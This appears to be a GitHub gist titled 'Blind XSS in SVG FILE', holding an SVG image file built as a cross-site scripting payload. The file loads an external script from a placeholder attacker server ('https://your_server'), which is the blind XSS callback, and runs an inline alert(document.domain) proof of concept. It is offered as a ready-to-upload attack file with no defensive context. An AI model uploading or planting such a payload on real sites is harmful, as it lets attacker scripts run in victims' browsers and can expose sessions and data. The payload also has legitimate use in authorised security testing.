Skip to content

Instantly share code, notes, and snippets.

@l34r00t
Last active November 24, 2022 08:47
Show Gist options
  • Save l34r00t/ce4515d1659f42448f91f2500484c91b to your computer and use it in GitHub Desktop.
Save l34r00t/ce4515d1659f42448f91f2500484c91b to your computer and use it in GitHub Desktop.
Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
<!-- Script linked from the outside-->
<script xlink:href="https://your_server" />
<script>
//<![CDATA[
alert(document.domain);
]]>
</script>
</svg>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment